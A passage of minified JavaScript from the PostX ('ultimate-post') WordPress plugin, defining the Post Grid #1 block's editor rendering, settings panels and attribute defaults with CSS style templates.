Gap","ultimate-post")}}]},{type:"layout+adv_style",layoutData:{type:"layout",key:"layout",label:__("Layout","ultimate-post"),pro:!0,block:"post-grid-1",options:[{img:"assets/img/layouts/pg1/l1.png",label:"Layout 1",value:"layout1",pro:!1},{img:"assets/img/layouts/pg1/l2.png",label:"Layout 2",value:"layout2",pro:!0},{img:"assets/img/layouts/pg1/l3.png",label:"Layout 3",value:"layout3",pro:!0},{img:"assets/img/layouts/pg1/l4.png",label:"Layout 4",value:"layout4",pro:!0},{img:"assets/img/layouts/pg1/l5.png",label:"Layout 5",value:"layout5",pro:!0}]},advStyleData:{type:"layout",key:"gridStyle",label:__("Advanced Style","ultimate-post"),pro:!0,tab:!0,block:"post-grid-1",options:[{img:"assets/img/layouts/pg1/s1.png",label:__("Style 1","ultimate-post"),value:"style1",pro:!1},{img:"assets/img/layouts/pg1/s2.png",label:__("Style 2","ultimate-post"),value:"style2",pro:!0},{img:"assets/img/layouts/pg1/s3.png",label:__("Style 3","ultimate-post"),value:"style3",pro:!0},{img:"assets/img/layouts/pg1/s4.png",label:__("Style 4","ultimate-post"),value:"style4",pro:!0}]}},{type:"feat_toggle",label:__("Grid Features","ultimate-post"),[J?"exclude":"dep"]:a.N2}],store:$e}),(0,o.createElement)("div",Je,Ke&&(0,o.createElement)("style",{dangerouslySetInnerHTML:{__html:Ke}}),(0,o.createElement)("div",{className:"ultp-block-wrapper"},(F||W||D)&&(0,o.createElement)(s.Z,{attributes:j,setAttributes:l,onClick:()=>{Ge("heading"),qe("heading")},setSection:Ge,setToolbarSettings:qe}),function(){const e=`${Ce}`,t="style1"==te||"style2"==te?`ultp-block-column-${oe.lg} ultp-sm-column-${oe.sm} ultp-xs-column-${oe.xs} ultp-grid1-responsive`:"",a=(e,t)=>(0,v.o6)()&&je&&(0,o.createElement)(f.Z,{idx:e,postId:t,fields:Ze,settingsOnClick:(e,t)=>{e?.stopPropagation(),qe(t)},selectedDC:Re.selectedDC,setSelectedDc:We,setAttributes:l,dcFields:Ze});return Re.error?(0,o.createElement)(I,{label:__("Posts are not available.","ultimate-post")},(0,o.createElement)("div",{style:{marginBottom:15}},__("Make sure Add Post.","ultimate-post"))):Re.loading?(0,o.createElement)(I,{className:"ultp-backend-block-loading",label:__("Loading…","ultimate-post")},(0,o.createElement)(L,null)):Re.postsList.length>0?(0,o.createElement)("div",{className:`ultp-block-items-wrap ultp-block-row ultp-pg1a-${te} ${t} ultp-${xe}`},Re.postsList.map(((t,i)=>{const s=JSON.parse(he.replaceAll("u0022",'"')),c={backgroundImage:t.image&&re?"url("+t.image[Q]+")":"#333"},d="style1"==te||"style2"==te&&0==i||"style3"==te&&i%3==0||"style4"==te&&(0==i||1==i)?Q:ee;return(0,o.createElement)(e,{key:i,className:`ultp-block-item post-id-${t.ID}`},(0,o.createElement)("div",{className:"ultp-block-content-wrap"},a(8,t.ID),(t.image&&!t.is_fallback||Ae)&&re&&"layout2"!=xe&&(0,o.createElement)(p.ZP,{catPosition:ue,imgOverlay:ve,imgOverlayType:be,imgAnimation:ye,post:t,imgSize:d,fallbackEnable:Ae,vidIconEnable:He,idx:i,Category:"aboveTitle"!=ue?(0,o.createElement)(n.Z,{post:t,catShow:ne,catStyle:ce,catPosition:ue,customCatColor:Te,onlyCatColor:_e,onClick:()=>{Ge("taxonomy-/-category"),qe("cat")}}):null,onClick:()=>{Ge("image"),qe("image")},vidOnClick:()=>{Ge("video"),qe("video")}}),"layout2"===xe&&(0,o.createElement)("div",{className:"ultp-block-content-image",style:c}),(0,o.createElement)("div",{className:"ultp-block-content"},a(7,t.ID),"aboveTitle"==ue&&(0,o.createElement)(n.Z,{post:t,catShow:ne,catStyle:ce,catPosition:ue,customCatColor:Te,onlyCatColor:_e,onClick:e=>{Ge("taxonomy-/-category"),qe("cat")}}),a(6,t.ID),t.title&&pe&&1==de&&(0,o.createElement)(y.Z,{title:t.title,headingTag:Ee,titleLength:Pe,titleStyle:Be,onClick:e=>{Ge("title"),qe("title")}}),a(5,t.ID),ie&&"top"==we&&(0,o.createElement)(u.Z,{meta:s,post:t,metaSeparator:se,metaStyle:ae,metaMinText:Le,metaAuthorPrefix:Ie,metaDateFormat:Ue,authorLink:Me,onClick:e=>{Ge("meta"),qe("meta")}}),a(4,t.ID),t.title&&pe&&0==de&&(0,o.createElement)(y.Z,{title:t.title,headingTag:Ee,titleLength:Pe,titleStyle:Be,onClick:e=>{Ge("title"),qe("title")}}),a(3,t.ID),me&&(0,o.createElement)(r.Z,{excerpt:t.excerpt,excerpt_full:t.excerpt_full,seo_meta:t.seo_meta,excerptLimit:le,showFullExcerpt:ge,showSeoMeta:Se,onClick:e=>{Ge("excerpt"),qe("excerpt")}}),a(2,t.ID),fe&&(0,o.createElement)(P,null,(0,o.createElement)(g.Z,{readMoreText:ke,readMoreIcon:X,titleLabel:t.title,onClick:()=>{Ge("read-more"),qe("read-more")}})),a(1,t.ID),ie&&"bottom"==we&&(0,o.createElement)(P,null,(0,o.createElement)(u.Z,{meta:s,post:t,metaSeparator:se,metaStyle:ae,metaMinText:Le,metaAuthorPrefix:Ie,metaDateFormat:Ue,authorLink:Me,onClick:e=>{Ge("meta"),qe("meta")}})),a(0,t.ID),(0,v.o6)()&&je&&(0,o.createElement)(h.Z,{dcFields:Ze,setAttributes:l,startOnboarding:Ve}))))}))):(0,o.createElement)(I,{className:"ultp-backend-block-loading",label:Ne})}(),D&&"loadMore"==V&&(0,o.createElement)(c.Z,{loadMoreText:$,onClick:e=>{Ge("pagination"),qe("pagination")}}),D&&"navigation"==V&&"topRight"!=G&&(0,o.createElement)(d.Z,{onClick:()=>{Ge("pagination"),qe("pagination")}}),D&&"pagination"==V&&(0,o.createElement)(m.Z,{paginationNav:q,paginationAjax:z,paginationText:K,onClick:e=>{Ge("pagination"),qe("pagination")}}))))}},38196:(e,t,l)=>{"use strict";l.d(t,{FP:()=>v,PR:()=>y,ZP:()=>b});var o=l(67294),a=l(53049),i=l(38156),n=l(13448),r=l(32258),s=l(87282),p=l(92637),c=l(43581),u=l(69735),d=l(82473),m=l(87025);const{__}=wp.i18n,{useEffect:g}=wp.element,y=9,b=e=>{const{store:t}=e,{layout:l,queryType:n,advFilterEnable:r,advPaginationEnable:u,V4_1_0_CompCheck:{runComp:d}}=t.attributes,{context:y,section:b,settingTab:v,setSettingTab:h}=t;return g((()=>{(0,m.CH)(y,r,t,u)}),[r,u,t.clientId]),(0,o.createElement)(o.Fragment,null,(0,o.createElement)(c.default,{prev:"https://www.wpxpo.com/postx/blocks/#demoid6829",store:t}),(0,o.createElement)(p.Sections,{settingTab:v,setSettingTab:h},(0,o.createElement)(p.Section,{slug:"sorting",title:__("Post Sorting","ultimate-post")},(0,o.createElement)(a.lA,{title:"inline",initialOpen:!0,store:t}),(0,o.createElement)(a.T,{initialOpen:!1,store:t,title:__("Include","ultimate-post"),include:s.fL}),(0,o.createElement)(a.T,{initialOpen:!1,store:t,title:__("Exclude","ultimate-post"),include:s.M6}),(0,o.createElement)(a.T,{initialOpen:!1,store:t,title:__("inline","ultimate-post"),include:[{position:1,data:{type:"select",key:"queryUnique",label:__("Unique Content Group (Frontend Only)","ultimate-post"),pro:!0,options:[{value:"",label:__("Disable","ultimate-post")},{value:"group1",label:__("Content Group 1","ultimate-post")},{value:"group2",label:__("Content Group 2","ultimate-post")},{value:"group3",label:__("Content Group 3","ultimate-post")},{value:"group4",label:__("Content Group 4","ultimate-post")},{value:"group5",label:__("Content Group 5","ultimate-post")}],help:__("Unique Content Group solves the repetition of posts on multiple blocks.[Frontend Only]","ultimate-post")}}]})),(0,o.createElement)(p.Section,{slug:"setting",title:__("Settings","ultimate-post")},(0,o.createElement)(a.cA,{initialOpen:b.general,store:t,dynamicHelpText:{select:{key:"queryQuick",popular_post_1_day_view:"- Most viewed posts published in the last 24 hours",popular_post_7_days_view:"- Most viewed posts published in the last 7 days",popular_post_30_days_view:"- Most viewed posts published in the last 30 days",popular_post_all_times_view:"- Most viewed posts of all time"}},include:[{position:0,data:{type:"layout",isInline:!1,block:"post-grid-1",key:"layout",label:__("Layout","ultimate-post"),options:[{img:"assets/img/layouts/pg1/l1.png",label:"Layout 1",value:"layout1",pro:!1},{img:"assets/img/layouts/pg1/l2.png",label:"Layout 2",value:"layout2",pro:!0},{img:"assets/img/layouts/pg1/l3.png",label:"Layout 3",value:"layout3",pro:!0},{img:"assets/img/layouts/pg1/l4.png",label:"Layout 4",value:"layout4",pro:!0},{img:"assets/img/layouts/pg1/l5.png",label:"Layout 5",value:"layout5",pro:!0}]}},{position:1,data:{type:"layout",isInline:!1,key:"gridStyle",pro:!0,tab:!0,label:__("Select Advanced Style","ultimate-post"),block:"post-grid-1",options:[{img:"assets/img/layouts/pg1/s1.png",label:__("Style 1","ultimate-post"),value:"style1",pro:!1},{img:"assets/img/layouts/pg1/s2.png",label:__("Style 2","ultimate-post"),value:"style2",pro:!0},{img:"assets/img/layouts/pg1/s3.png",label:__("Style 3","ultimate-post"),value:"style3",pro:!0},{img:"assets/img/layouts/pg1/s4.png",label:__("Style 4","ultimate-post"),value:"style4",pro:!0}]}},{position:5,data:{type:"range",key:"rowSpace",min:0,max:80,step:1,responsive:!0,label:__("Row Gap","ultimate-post")}},{position:11,data:{type:"toggle",key:"equalHeight",label:__("Equal Height","ultimate-post"),pro:!0,customClass:"ultp-pro-field"}}]}),(0,o.createElement)(a.VH,{isTab:!0,store:t,depend:"titleShow",initialOpen:b.title,exclude:["titleBackground"]}),"layout2"!=l&&(0,o.createElement)(a.Hn,{isTab:!0,store:t,initialOpen:b.image,depend:"showImage",exclude:["imgMargin"],include:[{position:3,data:{type:"range",key:"imgSpacing",label:__("Img Spacing","ultimate-post"),min:0,max:100,step:1,responsive:!0}},{data:{type:"toggle",key:"fallbackEnable",label:__("Fallback Image Enable","ultimate-post")}},{data:{type:"media",key:"fallbackImg",label:__("Fallback Image","ultimate-post")}}],hrIdx:[{tab:"settings",hr:[3,11]},{tab:"style",hr:[4]}]}),(0,o.createElement)(a.Yk,{isTab:!0,store:t,initialOpen:b.meta,depend:"metaShow",exclude:["metaListSmall"],hrIdx:[{tab:"settings",hr:[]},{tab:"style",hr:[2,8]}]}),(0,o.createElement)(a.Bq,{isTab:!0,initialOpen:b["taxonomy-/-category"],depend:"catShow",store:t,hrIdx:[{tab:"style",hr:[8]}]}),(0,o.createElement)(a.X_,{isTab:!0,depend:"excerptShow",initialOpen:b.excerpt,store:t}),(0,o.createElement)(a.oY,{isTab:!0,store:t,initialOpen:b["read-more"],depend:"readMore"}),(0,o.createElement)(a.O2,{store:t,exclude:["contenWraptWidth","contenWraptHeight"],include:[{position:0,data:{type:"range",key:"contentWidth",min:0,max:100,step:1,unit:!1,responsive:!0,label:__("Content Width","ultimate-post")}},{position:1,data:{type:"color",key:"innerBgColor",label:__("Inner Bg Color","ultimate-post")}},{position:2,data:{type:"boxshadow",key:"contentShadow",label:__("Box Shadow","ultimate-post")}},{position:3,data:{type:"dimension",key:"contentRadius",label:__("Hover Radius","ultimate-post"),step:1,unit:!0,responsive:!0}}]}),"layout2"!=l&&(0,o.createElement)(a.rS,{initialOpen:b.video,depend:"vidIconEnable",store:t}),(0,o.createElement)(a.Yp,{initialOpen:b.separator,depend:"separatorShow",exclude:["septSpace"],store:t}),!d&&(0,o.createElement)(i.Z,{open:b.filter||b.pagination||b.heading},(0,o.createElement)(a.Wh,{isTab:!0,store:t,initialOpen:b.heading,depend:"headingShow"}),"posts"!=n&&"customPosts"!=n&&(0,o.createElement)(a.B0,{isTab:!0,store:t,initialOpen:b.filter,depend:"filterShow",hrIdx:[{tab:"settings",hr:[5]},{tab:"style",hr:[4,9]}]}),(0,o.createElement)(a.ng,{isTab:!0,store:t,initialOpen:b.pagination,depend:"paginationShow",hrIdx:[{tab:"style",hr:[4]}]}))),(0,o.createElement)(p.Section,{slug:"advanced",title:__("Advanced","ultimate-post")},(0,o.createElement)(a.yB,{initialOpen:!0,store:t,include:[{position:2,data:{type:"color",key:"loadingColor",label:__("Loading Color","ultimate-post"),pro:!0}}]}),(0,o.createElement)(a.Mg,{store:t}),(0,o.createElement)(a.iv,{store:t}))),(0,a.dH)())};function v({selected:e,store:t}){const{V4_1_0_CompCheck:{runComp:l}}=t.attributes,{metaShow:i,showImage:s,titleShow:p,catPosition:c,titlePosition:m,excerptShow:g,readMore:y,metaPosition:b,layout:v,fallbackEnable:h,catShow:f}=t.attributes,k=[i&&"bottom"==b,y,g,p&&0==m,i&&"top"==b,p&&1==m,f&&"aboveTitle"==c,h&&s&&"layout2"!=v];if((0,u.o6)()&&e.startsWith("dc_"))return(0,o.createElement)(d.Z,{store:t,selected:e,layoutContext:k});switch(e){case"filter":return l?null:(0,o.createElement)(r.Z,{text:"Filter"},(0,o.createElement)(a.sT,{store:t,attrKey:"fliterTypo",label:__("Filter Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.Eo)({include:["fliterSpacing","fliterPadding"],exclude:"__all",title:__("Filter Spacing","ultimate-post")}),store:t,label:__("Filter Spacing","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Filter Settings","ultimate-post"),styleTitle:__("Filter Style","ultimate-post"),settingsKeys:a.Df,styleKeys:a.YF,oArgs:a.rx,exStyle:["fliterTypo","fliterSpacing","fliterPadding"]}));case"heading":return l?null:(0,o.createElement)(r.Z,{text:"Heading"},(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Heading Settings","ultimate-post"),styleTitle:__("Heading Style","ultimate-post"),settingsKeys:a.cM,styleKeys:a.J5,oArgs:a.ii}));case"pagination":return l?null:(0,o.createElement)(r.Z,{text:"Pagination"},(0,o.createElement)(a.sT,{store:t,attrKey:"pagiTypo",label:__("Pagination Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.DU)({include:["pagiMargin","pagiPadding"],exclude:"__all",title:__("Pagination Spacing","ultimate-post")}),store:t,label:__("Pagination Spacing","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Pagination Settings","ultimate-post"),styleTitle:__("Pagination Style","ultimate-post"),settingsKeys:a.V2,styleKeys:a.xd,oArgs:a.YZ,exStyle:["pagiTypo","pagiMargin","pagiPadding"]}));case"video":return(0,o.createElement)(r.Z,{text:"Video"},(0,o.createElement)(n.Z,{buttonContent:a.gA,include:(0,a.q7)({include:a.JA,exclude:"__all",title:__("Video Icon Color","ultimate-post")}),store:t,label:__("Video Icon Color","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HU,include:(0,a.q7)({exclude:a.JA}),store:t,label:__("Video Settings","ultimate-post")}));case"title":return(0,o.createElement)(r.Z,{text:"Title"},(0,o.createElement)(a.sT,{store:t,attrKey:"titleTypo",label:__("Title Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.gA,include:(0,a.Wf)({include:["titleColor","titleHoverColor"],exclude:"__all",title:__("Title Color","ultimate-post")}),store:t,label:__("Title Color","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HU,include:(0,a.Wf)({exclude:["titleBackground","titleTypo","titleColor","titleHoverColor"],title:__("Title Settings","ultimate-post")}),store:t,label:__("Title Settings","ultimate-post")}));case"excerpt":return(0,o.createElement)(r.Z,{text:"Excerpt"},(0,o.createElement)(a.sT,{store:t,attrKey:"excerptTypo",label:__("Excerpt Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.gA,include:(0,a.BO)({include:["excerptColor"],exclude:"__all",title:__("Excerpt Color","ultimate-post")}),store:t,label:__("Excerpt Color","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HU,include:(0,a.BO)({exclude:["excerptTypo","excerptColor"],title:__("Excerpt Settings","ultimate-post")}),store:t,label:__("Excerpt Settings","ultimate-post")}));case"meta":return(0,o.createElement)(r.Z,{text:"Meta"},(0,o.createElement)(a.sT,{store:t,attrKey:"metaTypo",label:__("Meta Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.cr)({include:["metaSpacing","metaMargin","metaPadding"],exclude:"__all",title:__("Meta Spacing","ultimate-post")}),store:t,label:__("Meta Spacing","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.Cz,include:(0,a.cr)({include:a._y,exclude:"__all",title:__("Meta Texts","ultimate-post")}),store:t,label:__("Meta Texts","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Meta Settings","ultimate-post"),styleTitle:__("Meta Style","ultimate-post"),settingsKeys:a.G7,styleKeys:a.hd,oArgs:a.jK,exSettings:["metaListSmall"],exStyle:["metaTypo","metaMargin","metaPadding","metaSpacing"]}));case"read-more":return(0,o.createElement)(r.Z,{text:"Read More"},(0,o.createElement)(a.sT,{store:t,attrKey:"readMoreTypo",label:__("Read More Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.NJ)({include:["readMoreSacing","readMorePadding"],exclude:"__all",title:__("Read More Spacing","ultimate-post")}),store:t,label:__("Read More Spacing","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Read More Settings","ultimate-post"),styleTitle:__("Read More Style","ultimate-post"),settingsKeys:a.qM,styleKeys:a.ad,oArgs:a.e5,exStyle:["readMoreTypo","readMoreSacing","readMorePadding"]}));case"cat":return(0,o.createElement)(r.Z,{text:"Taxonomy/Category",textScroll:!0},(0,o.createElement)(a.sT,{store:t,attrKey:"catTypo",label:__("Category Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.v9)({include:["catSacing","catPadding"],exclude:"__all",title:__("Category Spacing","ultimate-post")}),store:t,label:__("Category Spacing","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Category Settings","ultimate-post"),styleTitle:__("Category Style","ultimate-post"),settingsKeys:a.eC,styleKeys:a.EK,oArgs:a.op,exStyle:["catTypo","catSacing","catPadding"]}));case"image":return(0,o.createElement)(r.Z,{text:"Image"},(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Image Settings","ultimate-post"),styleTitle:__("Image Style","ultimate-post"),settingsKeys:a.pj,styleKeys:a.hH,oArgs:a.Po,incStyle:[{position:0,data:{type:"range",key:"imgSpacing",label:__("Img Spacing","ultimate-post"),min:0,max:100,step:1,responsive:!0}}],incSettings:[{data:{type:"toggle",key:"fallbackEnable",label:__("Fallback Image Enable","ultimate-post")}},{data:{type:"media",key:"fallbackImg",label:__("Fallback Image","ultimate-post")}}]}));default:return null}}},22850:(e,t,l)=>{"use strict";l.d(t,{Z:()=>n});var o=l(92165),a=l(73151),i=l(51579);const n={blockId:{type:"string",default:""},currentPostId:{type:"string",default:""},previewImg:{type:"string",default:""},layout:{type:"string",default:"layout1"},headingText:{type:"string",default:"Post Grid #1"},gridStyle:{type:"string",default:"style1"},columns:{type:"object",default:{lg:"3",xs:"1",sm:"2"},style:[{depends:[{key:"gridStyle",condition:"==",value:["style1","style2"]}],selector:"{{ULTP}} .ultp-block-items-wrap { grid-template-columns: repeat({{columns}}, 1fr); }"}]},columnGridGap:{type:"object",default:{lg:"30",unit:"px"},style:[{selector:"{{ULTP}} .ultp-block-row { grid-column-gap: {{columnGridGap}}; }"}]},rowSpace:{type:"object",default:{lg:"30"},style:[{depends:[{key:"separatorShow",condition:"!=",value:!0}],selector:"{{ULTP}} .ultp-block-row {row-gap: {{rowSpace}}px; }"},{depends:[{key:"separatorShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item { padding-bottom: {{rowSpace}}px; margin-bottom:{{rowSpace}}px; }"}]},equalHeight:{type:"boolean",default:!1,style:[{selector:"{{ULTP}} .ultp-block-content-wrap { height: 100%; color: red; } \n        {{ULTP}} .ultp-block-content,\n        {{ULTP}} .ultp-block-content-wrap { display: flex; flex-direction: column; }\n        {{ULTP}} .ultp-block-content { flex-grow: 1; flex: 1; }\n        {{ULTP}} .ultp-block-readmore { margin-top: auto;}"}]},contentTag:{type:"string",default:"div"},titleShow:{type:"boolean",default:!0},titleStyle:{type:"string",default:"none"},titleAnimColor:{type:"string",default:"black",style:[{depends:[{key:"titleStyle",condition:"==",value:"style1"}],selector:"{{ULTP}} .ultp-title-style1 a {  \n            cursor: pointer; \n            text-decoration: none; \n            display: inline; \n            padding-bottom: 2px; \n            transition: all 0.35s linear !important;\n            background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% ); \n            background-size: 0px 2px; \n            background-repeat: no-repeat; \n            background-position: left 100%; \n          }"},{depends:[{key:"titleStyle",condition:"==",value:"style2"}],selector:"{{ULTP}} .ultp-title-style2 a:hover {  \n            border-bottom:none; \n            padding-bottom: 2px; \n            background-position:0 100%; \n            background-repeat: repeat; \n            background-image: url(\"data:image/svg+xml;charset=utf8,%3Csvg id='squiggle-link' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' xmlns:ev='http://www.w3.org/2001/xml-events' viewBox='0 0 10 18'%3E%3Cstyle type='text/css'%3E.squiggle%7Banimation:shift .5s linear infinite;%7D@keyframes shift %7Bfrom %7Btransform:translateX(-10px);%7Dto %7Btransform:translateX(0);%7D%7D%3C/style%3E%3Cpath fill='none' stroke='{{titleAnimColor}}' stroke-width='1' class='squiggle' d='M0,17.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5' /%3E%3C/svg%3E\"); \n          }"},{depends:[{key:"titleStyle",condition:"==",value:"style3"}],selector:"{{ULTP}} .ultp-title-style3 a {  \n              text-decoration: none; transition: all 1s cubic-bezier(1,.25,0,.75) 0s; \n              position: relative; \n              transition: all 0.35s ease-out; \n              padding-bottom: 3px; \n              border-bottom:none; \n              padding-bottom: 2px; \n              background-position:0 100%; \n              background-repeat: repeat; \n              background-image: url(\"data:image/svg+xml;charset=utf8,%3Csvg id='squiggle-link' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' xmlns:ev='http://www.w3.org/2001/xml-events' viewBox='0 0 10 18'%3E%3Cstyle type='text/css'%3E.squiggle%7Banimation:shift .5s linear infinite;%7D@keyframes shift %7Bfrom %7Btransform:translateX(-10px);%7Dto %7Btransform:translateX(0);%7D%7D%3C/style%3E%3Cpath fill='none' stroke='{{titleAnimColor}}' stroke-width='1' class='squiggle' d='M0,17.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5' /%3E%3C/svg%3E\"); \n          }"},{depends:[{key:"titleStyle",condition:"==",value:"style4"}],selector:"{{ULTP}} .ultp-title-style4 a { \n            cursor: pointer; \n            font-weight: 600; \n            text-decoration: none; \n            display: inline; padding-bottom: 2px; \n            transition: all 0.3s linear !important; \n            background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% ); \n            background-size: 100% 2px; background-repeat: no-repeat; background-position: left 100%; \n          }"},{depends:[{key:"titleStyle",condition:"==",value:"style5"}],selector:"{{ULTP}} .ultp-title-style5 a:hover { \n              text-decoration: none; \n              transition: all 0.35s ease-out; \n              border-bottom:none; \n              padding-bottom: 2px; \n              background-position:0 100%; \n              background-repeat: repeat; \n              background-size:auto; \n              background-image: url(\"data:image/svg+xml;charset=utf8,%3Csvg id='squiggle-link' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' xmlns:ev='http://www.w3.org/2001/xml-events' viewBox='0 0 10 18'%3E%3Cstyle type='text/css'%3E.squiggle%7Banimation:shift .5s linear infinite;%7D@keyframes shift %7Bfrom %7Btransform:translateX(-10px);%7Dto %7Btransform:translateX(0);%7D%7D%3C/style%3E%3Cpath fill='none' stroke='{{titleAnimColor}}' stroke-width='1' class='squiggle' d='M0,17.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5' /%3E%3C/svg%3E\"); \n            }"},{depends:[{key:"titleStyle",condition:"==",value:"style5"}],selector:"{{ULTP}} .ultp-title-style5 a { \n            cursor: pointer; \n            text-decoration: none; \n            display: inline; \n            padding-bottom: 2px; \n            transition: all 0.3s linear !important; \n            background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  \n            background-size: 100% 2px; \n            background-repeat: no-repeat; background-position: left 100%; \n          }"},{depends:[{key:"titleStyle",condition:"==",value:"style6"}],selector:"{{ULTP}} .ultp-title-style6 a { \n            background-image: linear-gradient(120deg, {{titleAnimColor}} 0%, {{titleAnimColor}} 100%); \n            background-repeat: no-repeat; \n            background-size: 100% 2px; background-position: 0 88%; \n            transition: background-size 0.15s ease-in; padding: 5px 5px; \n          }"},{depends:[{key:"titleStyle",condition:"==",value:"style7"}],selector:"{{ULTP}} .ultp-title-style7 a { \n            cursor: pointer; \n            text-decoration: none; \n            display: inline; \n            padding-bottom: 2px; \n            transition: all 0.3s linear !important; \n            background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  \n            background-size: 0px 2px; \n            background-repeat: no-repeat; \n            background-position: right 100%; \n          }"},{depends:[{key:"titleStyle",condition:"==",value:"style8"}],selector:"{{ULTP}} .ultp-title-style8 a {\n            cursor: pointer; \n            text-decoration: none; \n            display: inline; \n            padding-bottom: 2px; \n            transition: all 0.3s linear !important; \n            background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  \n            background-size: 0px 2px; background-repeat: no-repeat; background-position: center 100%; \n          }"},{depends:[{key:"titleStyle",condition:"==",value:"style9"}],selector:"{{ULTP}} .ultp-title-style9 a {\n            background-image: linear-gradient(120deg,{{titleAnimColor}} 0%, {{titleAnimColor}} 100%); \n            background-repeat: no-repeat; \n            background-size: 100% 10px; \n            background-position: 0 88%; \n            transition: 0.3s ease-in; padding: 3px 5px; \n          } "}]},headingShow:{type:"boolean",default:!0},excerptShow:{type:"boolean",default:!0},showImage:{type:"boolean",default:!0},filterShow:{type:"boolean",default:!1,style:[{depends:[{key:"queryType",condition:"!=",value:["posts","customPosts"]}]}]},paginationShow:{type:"boolean",default:!0},openInTab:{type:"boolean",default:!1},notFoundMessage:{type:"string",default:"No Post Found"},titleTag:{type:"string",default:"h3"},titlePosition:{type:"boolean",default:!0},titleColor:{type:"string",default:"var(--postx_preset_Contrast_1_color)",style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-content .ultp-block-title a { color:{{titleColor}} !important; }"}]},titleHoverColor:{type:"string",default:"var(--postx_preset_Primary_color)",style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-content .ultp-block-title a:hover { color:{{titleHoverColor}} !important; }"}]},titleTypo:{type:"object",default:{openTypography:1,size:{lg:"22",unit:"px"},spacing:{lg:"0",unit:"px"},height:{lg:"26",unit:"px"},transform:"",decoration:"none",family:"",weight:"500"},style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-items-wrap .ultp-block-item .ultp-block-title, \n          {{ULTP}} div.ultp-block-wrapper .ultp-block-items-wrap .ultp-block-item .ultp-block-content .ultp-block-title a"}]},titlePadding:{type:"object",default:{lg:{top:10,bottom:5,unit:"px"}},style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-title { padding:{{titlePadding}}; }"}]},titleLength:{type:"string",default:0},imgCrop:{type:"string",default:"yes"==ultp_data.disable_image_size?"full":"ultp_layout_landscape",depends:[{key:"showImage",condition:"==",value:!0}]},imgCropSmall:{type:"string",default:"yes"==ultp_data.disable_image_size?"full":"ultp_layout_square",style:[{depends:[{key:"showImage",condition:"==",value:!0},{key:"gridStyle",condition:"!=",value:"style1"}]}]},imgWidth:{type:"object",default:{lg:"",ulg:"%"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-image { max-width: {{imgWidth}}; width: 100%; }\n\t\t\t\t\t{{ULTP}} .ultp-block-item .ultp-block-image img { width: 100% }\n\t\t\t\t\t{{ULTP}} .ultp-block-item .ultp-block-video-content video,\n\t\t\t\t\t{{ULTP}} .ultp-block-item .ultp-block-video-content iframe { max-width: {{imgWidth}}; width: 100% !important; }"}]},imgHeight:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item .ultp-block-image img, \n          {{ULTP}} .ultp-block-item .ultp-block-video-content video,\n          {{ULTP}} .ultp-block-item .ultp-block-video-content iframe { height: {{imgHeight}} !important; }"}]},imageScale:{type:"string",default:"cover",style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item .ultp-block-image img {object-fit: {{imageScale}};}"}]},imgAnimation:{type:"string",default:"opacity"},imgGrayScale:{type:"object",default:{lg:"0",ulg:"%",unit:"%"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-image { filter: grayscale({{imgGrayScale}}); }"}]},imgHoverGrayScale:{type:"object",default:{lg:"0",unit:"%"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item:hover .ultp-block-image { filter: grayscale({{imgHoverGrayScale}}); }"}]},imgRadius:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-image { border-radius:{{imgRadius}}; 